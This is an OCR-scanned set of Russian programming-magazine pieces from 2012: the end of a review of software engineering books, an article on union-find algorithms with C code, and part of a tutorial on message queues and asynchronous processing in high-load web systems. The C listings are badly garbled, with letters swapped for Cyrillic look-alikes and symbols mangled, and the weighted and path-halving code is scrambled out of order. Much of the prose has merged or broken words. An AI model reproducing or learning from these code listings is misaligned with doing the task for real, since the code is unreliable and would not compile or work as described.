инфраструктуру доступа кданным. 

Один из признанных лидеров разработки ПО, Кент Бек сказал о книге 
Эванса: «Эта книга должна стоять на полке у каждого мыслящего 
программиста». Хочется добавить к словам Кента, что книга должна 
не просто «стоять на полке» — ее должен прочитать каждый мыслящий 
программист. 




■ озьми любую известную 
^ книгу об управлении про- 
ектами по созданию ПО, 
и ты непременно найдешь ссылку 
на монументальный труд Фредерика 
Брукса «Мифический человеко- 
месяц». Книга написана в 1975 году, 
но изложенные в ней теории и прин- 
ципы актуальны и сегодня. Материал 
книги основан на собственном опыте 
Брукса по управлению проектом 
создания операционной системы 
05/360 в компании ІВМ. В проекте 
принимало участие более 1000 чело- 
век. За три года работы над ОС было 
затрачено около 5000 человеко-лет! 

Закон Брукса — принцип управ- 
ления, наиболее часто цитируемый другими авторами, — гласит: «Если 
проект не укладывается в сроки, то добавление рабочей силы задержит 
его еще больше». Причина проблемы состоит в том, что в программиро- 
вании, как правило, невозможно разбить задачу на определенное коли- 
чество независимых частей. Подзадачи связаны между собой, поэтому 
последовательность работ накладывает свои ограничения на про- 
должительность выполнения. Еще одна причина кроется во времени, 
затрачиваемом на взаимодействие разработчиков между собой. 

Чтобы свести к минимуму временные затраты на взаимодействие 
участников проекта, автор предлагает организовать «операционные 
бригады» — когда решением отдельной задачи занимается небольшая 
команда, состоящая из «хирурга» (главного программиста), «второго 
пилота» и ряда сотрудников, обеспечивающих работу бригады как еди- 
ного целого. 

Материалы одной из самых известных и обсуждаемых статей Брукса 
«Серебряной пули нет» представлены в одноименной главе книги. 

Брукс утверждает, что нет ни одного открытия, ни в технологии, ни в ме- 
тодах управления, использование которого обещало бы на порядок 
повысить производительность, надежность и простоту разработки ПО. 
Все прежние попытки повышения производительности разработки 
ПО разрешают лишь второстепенные сложности, тогда как решение 
основной сложности ложится на плечи программиста. 

Данная книга оказала влияние на всю отрасль разработки про- 
граммного обеспечения. Для того чтобы поверхностно изложить ее ма- 
териал, не хватило бы целой статьи. Да это и не нужно, так как вряд 
ли получится рассказать лучше самого Брукса. 



ЗАКЛЮЧЕНИЕ 



Фрэнсис Бэкон сказал: «Некоторые книги нужно пробовать, дру- 
гие — глотать, а очень немногие — прожевывать и переваривать». 
Мы выбрали лучшие, на наш взгляд, книги по программированию 
и предлагаем читателю «прожевать и переварить» их. Крэг Ларман 
познакомит с миром объектно-ориентированного анализа и проекти- 
рования. Мартин Фаулер снимет завесу тайны построения реальных 
корпоративных приложений. «Экстремальное программирование» 
обучит гибкому подходу к разработке ХР. «Разработка через тести- 
рование» приобщит к написанию тестов, чем поможет обеспечить 
надежность и простоту поддержки кода ваших программ. Эрик Эванс 
заложит навыки построения наиболее оптимальной и корректной 
доменной модели. «Мифический человеко-месяц» познакомит 
с основами менеджмента проектов по разработке ПО. ц-ц 
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В наше время, когда даже мобильные теле- 
фоны имеют четырехъядерные процессоры 
с гигагерцами тактовой частоты, программи- 
сты редко задумываются об экономном рас- 
ходовании ресурсов компьютера и скорости 
выполнения поставленных задач. Это вовсе 
не вина кодеров — просто большинство со- 
временных программ решают не настолько 
критичные задачи, чтобы думать об их опти- 
мизации. Но когда дело доходит до серьез- 
ных вычислений, даже на самых мощных 
суперЭВМ требуется использовать правиль- 
ные алгоритмы. 




Таблица 1. Примѳрзадачи связности 



егодня мы попробуем решить так называемую задачу 
связности. Чтобы понять, о чем мы вообще будем говорить, 
нужно немного вникнуть в суть проблемы. Предположим, 
что у нас есть набор данных, каждый элемент которого представ- 
ляет собой пару натуральных чисел. Числа эти находятся в диапа- 
зоне от 0 до І\І, и их количество также равно N. Каждая пара чисел 
р-р означает, что р связано с ц. Более того, эта связь транзитивна. 
Для тех, кто прогуливал лекции, скажем, что транзитивность обо- 
значает следующее: если р связано с ц, а ц связано с г, то из этого 
следует, что р связано с г. Нам надо написать программу, которая 
бы последовательно получала на ввод пары таких чисел и выводи- 
ла бы только те из них, которые образуют новые связи. Чтобы было 
понятней, рассмотрим пример (см. таблицу 1). 

Мы представили работу нашей программы в виде таблицы. 
Первый столбец, который мы назвали «Ввод», — это пары чисел, 
которые программа получает на вход. Второй столбец — это то, 
что покажет программа пользователю после вбивания соот- 
ветствующих цифр. То есть в этом столбце отображаются либо 
пары чисел, которые образуют новые связи, либо ничего. Ячейки 
третьего столбца содержат в себе путь для пар чисел, которые не 
образуют новых связей. Например, пара 2-9 уже связана между 
собой последовательностью чисел 2-3-4-9, которая была получе- 
на на основе данных, введенных ранее. Еще раз взгляни на нашу 
таблицу, так как правильно понять задачу — ключ ктому, чтобы 
верно построить алгоритм ее решения. 

Но это все теория. На практике определение связности элемен- 
тов может применяться в разных ситуациях. Например, в языках 
программирования, в которых используются не сами переменные, 
а ссылки на них. Собственно, с изобретателей таких языков все 
и началось. Именно такое приложение дало старт исследованию 
задачи связности. 

Если еще раз взглянуть на таблицу 1 и попытаться в уме при- 
кинуть, как работала бы наша программа, то можно понять, что 
она сначала должна определить, представляет ли собой вводимая 
пара чисел новую связь или нет. Для этого алгоритм должен уметь 
искать такие числа в уже сформированных множествах, и если 
оба числа обнаружены в одном множестве, то связь считается не 
новой, если же в двух разных, то программа должна уметь объеди- 
нять эти множества друг с другом. Таким образом, весь алгоритм 
построен на двух абстрактных операциях — поиске и объединении, 
а также на структуре данных, которая позволит этим абстрактным 
операциям выполняться наиболее эффективно. 
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Алгоритмы объединения-поиска 



МЕТОД БЫСТРОГО ПОИСКА 

Как уже было сказано выше, алгоритмы семейства объединения- 
поиска основаны на операциях Лпб и ипіоп и структуре данных, 
с которой будут работать эти операции. Такой структурой у нас 
будет простой массив, элементами которого являются целые числа. 
Этот массив будет хранить информацию, требуемую для работы ЛпсІ 
и ипіоп. Для простоты ограничим размер массива 1000 элемен- 
тов, тем самым определив максимальное значение числа в паре. 
Это значение будет равно 999. Давай сразу взглянем на код. 

Реализация метода быстрого поиска 

#іпс1исІе < зіісііо . И > 

#с!ебпе N 1000 



іпі: таіп( ) 

ІПІ= і, р , , я.» 1:. ; 

іпі: ісІ[ІМ] ; 



// Инициализация массива 
-Рог (і = 0; і < N ; і++) 

ісі[і] = і; 



шбііе ( 5 сап-р("%сІ %сІ\п" _д_&р, &я) =^2) 

// Операция поиска 

ІТ Ш Ш == ісі [ Я ] ) 
сопііпие; 

// Операция объединения 

-Рог ( 1: = ісі [ р ] ^ і = 0; і < І\І; і++) 

== 1:) 

— ійШ = ісі[ д]; 

ргіпі-РС'ХТ^сІ %д\п" } р, я); 

} 

ь_ 

Первой строкой функции таіп, помимо переменных для пар 
чисел р и я и временных переменных, мы также объявляем мас- 
сив ісі, который содержит запись для каждого объекта и обладает 
тем свойством, что элементы ісі [р] и ісКя) равны тогда и только 
тогда, когда объекты р и я связаны. На начальном этапе этот 
массив инициализируется значениями от 0 до N - 1 с помощью 



цикла (ог. Далее мы начинаем считывать пары чисел и проверять 
их на связность. 

Первым делом мы сравниваем ісі [р] и ісі [я]; если они равны, 
то считаем, что р и я уже связаны между собой, и поэтому перехо- 
дим к следующей паре. Собственно, эта конструкция \і и является 
абстрактной операцией поиска. Но если мы не находим связи р и я 
на основе данных массива, мы должны создать новую при помощи 
ипіоп. Для этого мы просматриваем массив ісі, изменяя все записи 
с индексом р на записи с индексом ц. Эти действия объединяют два 
разных множества, которые содержат р и ц. Ну и не стоит забывать, 
что программа должна вывести пары, которые образуют новые 
связи, поэтому в завершение обработки пары выводим р и ц. 

Так какЯпсІ фактически реализуется всего одним оператором 
сравнения, а ипіоп должна проходить по всему массиву, то такой 
алгоритм называют быстрым поиском. Он выполняет не менее 
МІ\І инструкций, где N — это количество объектов, для которых 
требуется выполнить М операций объединения. Если количество 
объектов невелико, например несколько тысяч, то такой подход 
приемлем. С миллионами же вводимых значений мы немножко 
обломаемся. 

Впрочем, перед тем, как попробовать усовершенствовать метод 
быстрого поиска, давай пройдемся по набору данных, использо- 
ванному нами в таблице 1. Визуализация работы яиіск-ПпсІ алго- 
ритма представлена в таблице 2. Каждая строка таблицы — это 
состояния переменных р и я (первые два столбца), а также массива 
ісі на начальной стадии и при вводе новых пар чисел. Красным 
отмечены значения элементов массива, которые изменились из-за 
операции ипіоп, а зеленым — значения, на которые были заменены 
числа в красных ячейках (см. таблицу 2). 

Эти же данные можно представить в виде дерева. Можно 
считать, что объекты вершины деревьев представляют множества, 
к которым они принадлежат, а остальные указывают на предста- 
вителя их множества. Следует обратить внимание на то, что связи 
между объектами в этом представлении необязательно соответ- 
ствуют связям вводимых пар. Эти деревья отображают информа- 
цию, которую запоминает алгоритм, чтобы в дальнейшем было 
возможно определить, соединены пары или нет. 

МЕТОД БЫСТРОГО ОБЪЕДИНЕНИЯ 

Скорость работы предыдущего алгоритма не очень велика. 

Для исправления этого недостатка был придуман метод быстрого 
объединения. В его основе лежит все тотже массив, индексиро- 
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Таблица 2. Визуализация быстрого поиска 
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ванный по именам объектов, но используется иная интерпрета- 
ция значений, что приводит к более сложной структуре данных. 

В такой структуре каждый объект указывает на другой объект того 
же множества. Чтобы проверить, находятся ли два объекта в одном 
и том же множестве, следует пройти по указателям на каждый 
из них, пока мы не достигнем объекта, указывающего на само- 
го себя. Если найденные объекты равны, то пара р-р находится 
в одном множестве и, следовательно, связана между собой. В про- 
тивном случае, если мы получили разные объекты, указывающие 
сами на себя, нам нужно создать связь между р-р. 

Реализация метода быстрого объединения 

іп~Е таіп( ) 

І_ 

іпі: і, р , д; 

іггЕ ісІ[ІМ] ; 



-Рог (і =_ 0 ; і < N ; І++1 

шт= и 



ыбііе (зсап-РГ^сІ %сІ\п" . &р. &д ^ == 2 ) 

{ 

// Операция поиска 

-Рог (і = р; і != ісІ[і]; і^ісІ[і]); 
ІД 3 ! = ІСІ[Д ] 3 ЗіісІ[з]); 

— І-Г (і “ -1) 

сопіііпие; 

// Операция объединения 

Щі] = з; 

ргіп1:-р( "\1:%сІ %сІ\п" а _р і р); 

} 

ь_ 



Как мы видим, операция РіпсІ теперь реализуется с помо- 
щью двух циклов {ог, а ипіоп, напротив, состоит всего из одного 
оператора равенства == в условии ІГ Именно поэтому алгоритм 
называется методом быстрого объединения. Для более наглядного 
представления его работы можно посмотреть на таблицу 3. 

Из таблицы видно, что мы следуем указателям из р, чтобы 
дойти до элемента і, для которого ісІ[і] == і. То же самое мы делаем 
и для р. Значения і и ) при поиске для пары 5-6 будут 5-6-9-0 
и 6-9-0 соответственно. Если представить все это в виде дере- 
вьев, то картина получится гораздо интересней, чем при быстром 
поиске. Глубина связей тут больше, чем у р и іск-ГіпсІ . Новый 
алгоритм действительно можно считать более совершенным: он 
устраняет главный недостаток быстрого поиска (для выполне- 
ния М операций объединения на N объектов программе нужно 
выполнить минимум МЫ инструкций). Но, несмотря на это, нельзя 
гарантировать, что работа алгоритма быстрого объединения будет 
намного эффективнее быстрого поиска. В общем случае для М > N 
может потребоваться выполнение более МІЧ/2 инструкций. Но вот 
на сколько больше будет это число — зависит от набора входных 
данных. 

В наихудшем случае, когда пары вводятся в порядке 1-2, 2-3, 

3-4 и так далее, мы получим сложность гораздо больше МІЧ/2, 
а дерево связей превратится в одну прямую линию. 

ВЗВЕШЕННАЯ ВЕРСИЯ 
БЫСТРОГО ОБЪЕДИНЕНИЯ 

Чтобы обезопасить себя от последствий «худшего случая», нужно 
немного изменить алгоритм ріііск-ііпіоп. Мы будем объединять де- 
ревья не случайным образом, а на основе количества узлов в них, 
то есть меньшее дерево будет сливаться с большим. 

Для этих целей нам потребуется ввести дополнительный 
массив, который будет хранить информацию о количестве узлов 
в деревьях. Плюс нам потребуется дописать несколько строк кода, 
которые будут использовать информацию из этого массива. 




Представление быстрого поиска в виде 
дерева 



Представление быстрого объединения в виде 
дерева 
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Алгоритмы объединения-поиска 



Реализация взвешенной версии быстрого объединения 

іітЕ таіп( ) 

ІГТЬ і, X р , д; 

іпі: і сі [ N ] . 52 [ N ] ; 



-Рог (і = 0 ; ± < І\І; і++) 

{ 

М[і ] = і; 

52[і] = 1 ; 



и/бііе (5сагѵР("%сІ %сІ\п" , &р л &я) == 2) 

// Операция п о иска 

-Рог (і = р; і != ісі [ і ] : і = ісі [ і ] ) ; 
-Гог (Д = Я; 1 != ШІІ 3 = ісІ[ з] ) ; 
і* (і == 3) 
сопіііпие; 

// Операция взвешенного объединения 

і* (зг [ і] < 52Щ) 

{ 

ісі[і] = 1 ; 

52Ш += 52[І] ; 

} еІ5е 

-л_ 

ісі[3 ] = і; 

12Щ-+= 52[]]; 

} 

ргіп1:-р( "\і:%сІ %сІ\п" а _р і я)і 

} 

ь_ 



ІСІЩ = Іі 

__5_2[.і] = 1 ; 

} 



_ыІті1е_(5сап-р( ,, %сІ %сІ\п " . &р. &я)^= 2) 

-М- 

// Операция поиска и сжатие путей делением их 

п ополам 

-Рог (і = р ; і != ісі [ і ] ; і = ісі [ і ] ) 

ШХІ = і сі [ і сІ[ і ]] ; 

О Д != ШІІ Д = ісі [Д ] ) 

Ші = МШІШі 
і* (і == І) 

сопіііпие; 

// Опера ция объеди нения 

а ( « щ < 52 Щ) 

{ 

ійШ = і; 

5ШТ+= 52 Іі] > 

} еізе 

{ 

І0[д ] = І; 

52[І] += 5 ШІІ 

} 

ргіпіі-р (_"А'І:%сІ %СІ\П", р і я); 

} 

Как видно из кода, при каждом проходе по массиву ісі во время 
поиска мы присваиваем і-му элементу указатель не на родитель- 
ский элемент, а на прародительский, таким образом существенно 
снижая глубину дерева. 



Такие небольшие модификации предыдущего алгоритма дают 
нам отличную экономию процессорного времени. Количество ин- 
струкций, которые алгоритм взвешенного быстрого объединения 
использует для обработки М ребер между N объектами, не превы- 
шаетзначения М |д |\|, умноженного на некоторую константу. При 
решении с помощью этого метода очень сложных задач мы по- 
лучаем линейную зависимость требуемого времени от количества 
вводимых данных. 

Если построить дерево, которое получится в результате работы 
ѵѵеідЫесІ диіск-ПпсІ на парах чисел из таблицы 1, то мы сразу 
увидим разницу по сравнению с деревом невзвешенной версии 
метода. Ахудший случай, когда данные представляют собой пары 
1-2, 2-3, 3-4 и так далее, перестанет таковым являться. Напомним, 
что простое быстрое объединение на этих парах чисел приводило 
к построению дерева, представляющего собой прямую. 

ВЗВЕШЕННОЕ БЫСТРОЕ ОБЪЕДИНЕНИЕ 
СО СЖАТИЕМ ПУТЕЙ 

Мы уже добились неплохих результатов. Чтобы еще повысить 
эффективность алгоритма, существует множество приемов, и один 
из них — сжатие путей. Суть его заключается в том, что в идеа- 
ле мы должны получить такое дерево связей, как при методе 
быстрого поиска. То есть все объекты должны напрямую указывать 
на вершину. Добиться этого можно разными способами. Мы рас- 
смотрим сжатие путей методом деления пополам. 

Взвешенное быстрое объединение с делением пополам 

таіп( ) 

ІПІ І, ±у р, я; 

іпі: ісі [ N ] . 52 [ N ] ; 



-Рог ( і = Ѳ; і < І\І; і++) 
{ 



ЗАКЛЮЧЕНИЕ 

Рассмотрев основные алгоритмы из семейства объединения- 
поиска, можно суверенностью сказать, что методы яиіск-бпсі 
и риіск-ипіоп не подходят для решения серьезных задач. Они 
слишком медленные и не могут гарантировать линейной сложности. 
А вот взвешенные версии быстрого объединения гораздо произво- 
дительней — разница заметна даже на небольших наборах данных. 
Это значит, что, даже если мы пишем под суперсовременное железо, 
не следует пренебрегать алгоритмической оптимизацией. Время, 
потраченное на разработку, с лихвой окупится в будущем. НЕ 




Слева — результат работы ѵѵеідЫесі циіск-^іпсі на наборе данных из таблицы 1; 
справа — результат работы ѵѵеідМес! циіск-ііпсі для худшего набора данных 

ЕШ 

Все описанные 
примеры ждут 
тебя на нашем 
диске. 




1 2 4 6 8 



3 5 7 9 



Результат работы быстрого взвешенного объединения 
с делением пополам в худшем случае 
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АКАДЕМИЯ 



УРОК» 



Большая часть информации, 
опубликованная по теме высоких нагрузок 
в интернете, представляетсобой всего 
лишь описания технических характеристик 
крупныхсистем. Мы же попробуем изложить 
принципы, по которым строятся архитектуры 
самых передовых и самых посещаемых 
интернет-проектов нашего времени. 



ХАКЕР 10/165/2012 



Каждый программ ист хочет стать лучшим, 
получать все более интересные и сложные 
задачи и решать их все более эффективными 
способами. В мире интернет-разработок 
к та ким задачам можно отнести те, 
с которыми сталкиваются разработчики 
в ысокона груженных систем. 



УЧЕБНИК 
ПО ВЫСОКИМ 
РУЗКАМ 








Учебник по высоким нагрузкам. Урок № 4 



МАСШТАБИРОВАНИЕ ВО ВРЕМЕНИ 

ІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІМ 



В прошлыхуроках мы говорили отом, какписатьпрограммы 
так, чтобы их можно было запустить в нескольких экземплярах 
и тем самым выдерживать большую нагрузку. В этом уроке мы 
поговорим о еще более интересных вещах — как использовать 
для построения технической архитектуры знания о бизнес- 
логике продукта и какобрабатывать данные тогда, когда 
это нужно, максимально эффективно используя аппаратную 
инфраструктуру. 

ОТЛОЖЕННЫЕ ВЫЧИСЛЕНИЯ 

Когда пользователь вводитзапрос на сайт, необходимо дать ему 
ответ, и для этого сначала придется проделать соответствующую 
работу. Скажем, если человек сделал модификационный за- 
прос (например, создал новый пост], то вам предстоит провер- 
нутьогромный объем работы. Недостаточно просто положить 
пост. Нужно обновить счетчики, оповестить друзей, разослать 
электронные уведомления. Хорошая новость: делать все сразу 
необязательно. 

Тотжесамый РасеЬоок послетого, каквы публикуете новый 
пост, делает еще одиннадцать разных вещей — и это только то, что 
видноснаружи невооруженным глазом. Причем всеэти операции 
исполняются в разное время. Например, электронное письмо 
с уведомлен и ем можно послать вообще минут через десять. 

Этотпринцип мы и возьмем на вооружение. Любой маленький 
сайтпо мере роста нагрузки сталкивается стем, что, оказывает- 
ся, больше нельзя делать все необходимые операции синхронно 
в функции обработки самого модификационногозапроса. В про- 
тивном случае пользователь не пол учит моментальный ответ. 

Современные фрейм ворки для веб-программирования часто 
не позволяют в явном виде реализовать та кой трюк, поскольку 
в них не предусмотрена возможность делать что-либо после 
отправки ответа пользователю. Однако есть и исключения. 

В популярном веб-сервере Ара сНе существует бол ее десяти 
стадий обработки запроса, включая трансляцию II РІ, авториза- 
цию, аутентификацию и собственно обработку за проса. Сюда же 
входяти стадии, которые выполняются уже послетого, какответ 
пользователю отправлен. Некоторые фреймворки (например, 
тосІ_регІ] позволяют перехватить эти стадии и повесить на них 
ваши собственные функции. Можно передать в эти функции дан- 
ные для обработки и спокойно обрабатывать их уже послетого, 
какпользовательполучил ответ. 

АСИНХРОННАЯ ОБРАБОТКА 

Однако иногда описанного выше подхода с постобработкой 
данных недостаточно. Действия, которые надо совершить с ними, 
могут за ни мать слишком много времени, а ресурсы веб-сервера 
небезграничны. 

В та ком случае помогает следующий архитектурный пат- 
терн — сохраните данные в некое промежуточное хранилище, 
а затем обработайте их с помощью отдельного асинхронного 
процесса. Термин «асинхронность» означает в общем случае 
разнесенность во времени. То есть да иные собираются сейчас, 
а обрабатываютсятогда, когда будетудобно. 

Например, очень часто асинхронно обсчитывается статистика 
уникальных посетителей — раз в день, как правило по ночам, 
в часы наименьшей загрузки, запускается скрипт, который берет 
весь массив данных, накопленных за день, обрабатывает их и со- 
храняет уже в другом виде. Такой подход применяется при раз- 
работке баннерных сетей, счетчиков и других подобных проектов. 
Часто в часы наименьшей нагрузки выполняются и различные 
обслуживающие процедуры: оптимизация баз данных, бэкапы. 




Обратите внимание — мы уже 
используем наше знание о бизнес- 
процессахвпроекте. Мызнаем, 
что детальную статистику за день 
пользователи готовы подождать, 
иучитываемэтотфактпри проекти- 
ровании архитектуры проекта. Более 
углубленное использованиеэтих 
знаний мы свами разберем дальше. 

ОЧЕРЕДИ 

Рассмотрим подробнееинструмен- 
ты, позволяющиеотложитьна потом 
те вещи, которые «не горят». Одно из 
уже упоминавшихся решений — про- 
межуточноехранилище. Носуще- 
ствуетцелый классоднотипныхза- 
дач,для которыххотелосьбы, чтобы 
это хранилище обладал о определен- 
ными свойствами. Это уже не просто 
данные для обработки — тутважен 
порядок, важна очередность. 

Для подобныхцелей используют 
инструмент, называемый очередя- 
ми, — особый вид хранилища, под- 
держивающий логику РІРО (первый 
вошел — первый вышел]. Получа- 
ются очереди сообщений и очереди 
задач, которые надо делать. Напри- 
мер, вместо того чтобы слатье-таіі, 
можно поместитьвочередьзадачу: 
«Послать е-таіі». Какой-то фоновый 
скрипт, который запущен, вытянет 



из очереди новый запрос. «О, надо 
послать е-таіі. Сейчас пошлю его». 

Очереди — довольно про- 
двинутый и часто встречающийся 
инструмент. Например, даже когда 
пользователь в ѴѴіпсІоѵѵз кликает 
мышкой на кнопку в приложении, 
то приложение не принимается 
немедленно обрабатывать это 
событие (ведь в этот момент при- 
ложение можетбытьзанято другим 
действием]. Операционная система 
присылает при ложен ию сообщение, 
содержащее описание совершен- 
ного пользователем действия. Со- 
общение ставится в очередь и будет 
обработано в порядке поступления. 
В результате если вы два раза клик- 
нитемышкой надва разныхпункта 
меню, то сначала откроется одно, 
потом другое. 

Для использования очередей 
есть ряд инструментов, один из 
наиболее популярных сейчас — 
ПаЬЫШО ( ѵѵѵѵѵѵ.гаЬЬіІтд.сот ]. 

написанный на Егіапд'е. Причем 
несмотря на колоссальные возмож- 
ности по обслуживанию очередей 
сообщений, начать использовать 
его крайне просто. Практически для 
любого языка программирования 
(РНР, Ру1:Ноп, ВиЬу и та к да л ее] есть 
готовые библиотеки. 
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АКАДЕМИЯ 



ОТ АВТОРОВ 

Основным направлением деятельности нашей компании является 
решение проблем, связанныхс высокой нагрузкой, консультирование, 
проектирование масштабируемыхархитектур, проведение нагрузочных 
тестирований и оптимизация сайтов. В число наших клиентов входят 
инвесторы из России и со всего мира, а также проекты «ВКонтакте», 
«Эльдорадо», «Имхонет», РЬоІозідМ.ги и другие. Вовремя консультаций 
мы часто сталкиваемся с тем, что многие не знают самых основ — что та- 
кое масштабирование и каким оно бывает, какие инструменты и для чего 
используются. Эта публикация продолжает серию статей «Учебникпо 
высоким нагрузкам». Вэтихстатьяхмы постараемся последовательно 
рассказатьобо всехинструментах, которыеиспользуются при построе- 
нии архитектуры высоконагруженныхсистем. 



В крупных веб-системах могут использоваться одновремен- 
но десятки очередей: очередь на отправку электронной почты, 
очередь для обновления счетчиков, очередь для обновления 
френдлент пользователей. 

По большому счету очереди — это пример межсервисной ком- 
муникации, когда один сервис (публикация поста] ста вит задач и 
другому сервису (рассылка электронной почты). Рассмотрим это 
подробнее на конкретном примере. 

ПРИМЕР ПРЕМОДЕРИРУЕМОЙ СОЦИАЛЬНОЙ СЕТИ 

Рассмотрим пример большого проекта социальной сети уровня 
РасеЬоок. Пользователи пишутпосты в огромном количестве, 
генерируются гигантские объемы различных операций. Недопу- 
стим, что это не просто РасеЬоок, а социальная сеть с премодера- 
цией всех сообщений. Задача стала еще сложнее — что делать? 

Разработчики посмотрели: посты храним так, комментарии 
храним так. Всё в разных табличках, может быть даже в базах дан- 
ных разного вида. Например, этих баз и табличек десять. Неужели 
модераторский софт дол жен будет ходить по десятку баз данных, 
вытаскивать обновления за последние пять минут из всех этих 
табличек? Объединять все изменения в один большой список 
и показывать модератору? А что, если модераторов несколько? 

А если данных очень много? 

Вот тут на помощь и приходят очереди. Любой постинг приво- 
дит не только к добавлению сообщения в большую базу да иных 
(где оно будет жить постоянно), но и к его попаданию в некую 
модераторскую систему. Взаимодействие сервисов позволяет 
навести тут порядок. 

Нижний красный блок на слайде — это исходящий сервер 
очередей РаЬЬіМО, который получаетсообщение. Этотсервер 
кем-то слушается стой стороны, и в результате приходящие 
данные перегруппировываются и уже складываются вдругую 
базу да иных или в другое место, специально предназначенное 
для модерации. Например, они группируются, и вместо модера- 
ции может идти, например, аналитическая система. Сам бог велел 
входящие данные преобразовывать, чтобы потом было удобно их 
обрабатывать и решать да иную конкретную узкую за дачу. 

Но вернемся к нашему примеру. Все эти сообщения каким-то 
образом просматриваются, и,таккаксхема базы данныхзаточе- 
на под модерацию, это происходит легко и просто. Нам что-то не 
нравится — удаляем это сообщение, и за простоя но также уходит 
обратно, в другую очередь: «Это сообщение из тех, что ты мне при- 
слал, удали». Естьтакойже разборщик, который беретэтузадачус 
удаленным сообщением, ищет, гдежеонотам все-таки лежит, и уда- 
ляет. Мы получили классический пример использования очереди. 

НЕКОНСИСТЕНТНОСТЬ ДАННЫХ 

Здесь возни кают не достатки, характерные для любой системы, 
которая хранит да иные в двух местах. Любая проблема с оборудо- 
ванием, с выполнением этой сложной функциональности — и воз- 



ни кает некой си стентность да иных. 
Например, сообщение попало 
в основную базу, ноне было добав- 
лено в очередь. Сообщение прошло 
модерацию, но оно реально удалено 
не было, потому что очередь, ответ- 
ственная за хранение сообщений на 
удаление, вышла из строя. 

Чтобы избежатьэтого, нужно 
писать программу та ким образом, 
чтобы при повторном ее выполне- 
нии она доходила до конца. Этот 
принцип называется идемпотент- 
ностью — повторное действие 
не изменит наши данные, если 
в первый раз все было сделано пра- 
вильно. Увы, это далеко не всегда 
можно применить. 

Другое решение — логическое 
л огирование действий. Создается 
некий блокнот, например файл, 
хранящийся на каком-то надеж- 
ном носителе. Программы при 
выполнении оставляюттам записи 
вида:«Яуспел сделатьто, то и то, 
но еще не успел сделать вот это» 
и «Я собираюсьсделатьэто». Если 
что-то пошло нетак, подобный 
отчетпозволитпонять, на каком 
этапе произошел сбой, и исправить 
положение. 

АЛГОРИТМ ПРОЕКТИРОВАНИЯ 
АРХИТЕКТУРЫ 

Рассмотрим решение нашей про- 
блемы, исходя из конкретныхусло- 
вий бизнес-логики. Сначала со- 
ставляем варианты использования 
проекта (ІІзе сазез], функциональ- 
ное описание, в нашем случае — 
основные веб- сервисы. Описываем, 
что конкретно делаетпользователь 
на той или иной странице. 

Например, страница пеѵѵзГеес) 
пользователя: 



• загружаются десять последних 
объектов-записей повремени 
объектов, опубликованных все- 
ми пользователями, на которых 
подписан пользователь; 

• для каждой иззаписей 
поднимается информация 

о пользователе-авторе (имя, 
аватар и ссылка на профиль); 

• для каждой иззаписей на 
странице поднимаются три по- 
следних комментария, по каж- 
дому комментарию поднимается 
аватар и имя пользователя. 

Отдельного у поминания заслу- 
живает обсуждение потенциальных 
сценариев дальнейшего развития 
проекта. Например, сейчас нет об- 
новления комментариев без пере- 
загрузки, а потом будет — такую 
возможность нужно предусмотреть 
еще на этапе начального проекти- 
рования. Далее по этим описаниям 
планируются потоки данных с рас- 
четом потенциальныхобъемов, 
требований кскорости в каждом 
случае. Важно также проговорить 
потенциальную степень деграда- 
ции данных. 

Например, у нас ожидается 
тридцать миллионов зарегистри- 
рованных пользователей в новой 
потенциальной социальной сети. 

По аналогии с существующими 
сетями предположим, что в день на 
са йт будет заход итьХ за регистри- 
рованных пользователей, то есть 
шестьмиллионов пользователей. 

Какое количество записей дела- 
ет в день пользователь? Этот вопрос 
требуетисследования, нодопустим, 
что в среднем три сообщения вдень 
кто-то больше, кто-то меньше. 

На практике большинство будет 



Очереди: модерация 



[Резервный дата-центр 



Егіапд- 
’ фронтенд 


Егіапд- 

'фронтенд 


Егіапд- 
’ фронтенд 
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г* 


Коп 


іии всех 







Заявки на удаление 
сообщений 



ч |0чередь наудаление 
Чотмодерированных 
комментариев 

Этотсервер очередей должен 
стоять на стороне кластера 
фронтендов для того, чтобы 
в случае пропадания связи 
с резервным ДЦ информация 
никуда не потерялась 
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Учебник по высоким нагрузкам. Урок № 4 



заходить на сайт только для чтения чужих сообщений, поэтому со- 
кратим в пять раз — пустьпишетпотри сообщения каждый пятый 
пользователь. 

Получается 3,6 миллиона записей в сутки. У каждого поль- 
зователя 100 подписчиков, то есть (если мы остаемся на схеме 
уведомлений об изменениях] 360 миллионов уведомлений в сут- 
ки. С учетом пикового характера веб-трафика получаем 10 тысяч 
уведомлений в секунду — это может быть проблемой! Мы видим 
такую цифру и понимаем, что нам придется рассылатьуведомле- 
н ия не в реальном времени. 

Чтобы рассчитать объемы данных, допустим, что полови- 
на сообщений текстовые, а половина — графические. Размер 
текстового сообщения в среднем 200 байт, графического — 100 
килобайт. Итого в день мы генерируем данных на 360 мегабайт 
текстовых сообщений и на 180 гигабайт графики. Это немало, 
и очевидно, что мы не можем просто положить тексты в 30 1_ базу 
данныхиделатьпоней выборки. Максимум — мы можемделать 
выборки по некоей упрощенной информации, например та блицам 
с идентификаторами. 

На этом этапе можно и нужно проговоритьсущности и связи 
между ними. Например, как на приведенном рисунке. Это пример 
из реального проекта простой социальной сети, разработанной 
нашей компанией. Здесь же мы проговариваем вопросы деграда- 
ции, для этого п рода кт- менеджер должен ответить нам на следую- 
щие вопросы: 

• Страшно ли, если запись друга появится в пеѵѵз^еесі пользо- 
вателя не моментально, а через пять секунд? А если через де- 
сять? Через минуту? Через час? Какова допустимая задержка? 

• Сколько последних записей мы выводим на одной странице? 
Десять? Двадцать? Могу ли я перейти к более старым записям? 

• Должны ли новые записи появляться на странице без переза- 
грузки? 

• Должны ли новые комментарии к записям, находящимся на 
странице, появляться без перезагрузки страницы? 

• Страшно ли, если записи будут подгружаться пользователю 
постепенно, не сразу, сначала одна, потом еще пять, а потом 
вдруг раз — и загрузилась запись где-то в середине? 



Интеркоммуникация сервисов 

Задача: необходимо уведомлять одни части системы 
о событиях, которые происходят в других частях: 

• размещение информации в пользовательских лентах 
(ІеесЫ о событиях, произошедших в сообществах; 

• лайки; 

• комментарии; 

• рассылка писем 



Здесьже мы прописываем 
скорость работы страницы (в нашем 
случае не более 0,2-0, 5 секунды, на- 
пример) и проговариваем какие-то 
особенности использования модуля. 
Например, в нашем случае с пеѵѵБ 
